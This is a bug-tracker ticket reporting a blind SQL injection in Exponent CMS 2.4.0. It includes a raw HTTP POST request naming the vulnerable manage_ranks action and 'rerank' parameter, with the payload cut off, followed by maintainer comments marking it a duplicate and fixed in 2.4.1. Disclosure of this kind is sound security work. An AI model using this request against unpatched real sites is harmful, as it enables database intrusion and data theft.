Blind SQL Injection Vulnerability in Exponent CMS 2.4.0 (5)
Reported by Nicky | November 6th, 2016 @ 07:46 AM | in 2.4.1 (closed)
POST /exponent/ HTTP/1.1
Content-Length: 251
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://192.168.118.1:80/exponent/
Cookie: PHPSESSID=f7859e8215b717f81b7dbd2e2c1a2caa;
adminer_key=cdeaea5d52a8f402a28bd04980a7851b
Host: 192.168.118.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21
(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: /
action=manage_ranks&controller=container&lastpage=http://192.168.118.1/exponent/&model=container&rerank%5b%5d...
Comments and changes to this ticket
-
dleffler November 6th, 2016 @ 10:50 AM
- Assigned user changed from “expNinja” to “dleffler”
- Milestone set to “2.4.1”
Appears to be a duplicate of #1394
-
expNinja November 6th, 2016 @ 10:53 AM
- State changed from “new” to “resolved”
(from [fffb2038de4c603931b785a4c3ec69cfd06181ba]) fix sql injection security vulnerability; reported by Nicky [#1394 state:resolved] [#1395 state:resolved] https://github.com/exponentcms/exponent-cms/commit/fffb2038de4c6039...
Please Sign in or create a free account to add a new ticket.
With your very own profile, you can contribute to projects, track your activity, watch tickets, receive and update tickets through your email and much more.
Create new ticket
Create your profile
Help contribute to this project by taking a few moments to create your personal profile. Create your profile »
Bug Tracker for Exponent CMS
expNinja
Referenced by
-
1394
Blind SQL Injection Vulnerability in Exponent CMS 2.4.0 (4)
(from [fffb2038de4c603931b785a4c3ec69cfd06181ba])
fix sql...